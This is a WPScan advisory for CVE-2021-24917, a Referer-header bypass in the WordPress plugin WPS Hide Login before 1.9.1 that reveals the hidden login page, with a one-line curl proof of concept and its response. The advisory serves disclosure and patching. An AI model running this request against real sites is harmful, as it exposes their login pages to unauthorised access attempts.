WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header

Description

The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.

Proof of Concept

curl --referer "something" -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302 
...
location: https://example.com/secret-login/?redirect_to=%2Fwp-admin%2Fsomething&reauth=1

Affects Plugins

wps-hide-login
Fixed in version 1.9.1

References

CVE
CVE-2021-24917
URL
https://wordpress.org/support/topic/bypass-security-issue/

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-863

Miscellaneous

Original Researcher

Daniel Ruf, Thalakus

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
15bb711a-7d70-4891-b7a2-c473e3e8b375

Timeline

Publicly Published

2021-10-27 (about 1 years ago)

Added

2021-11-02 (about 1 years ago)

Last Updated

2022-04-13 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin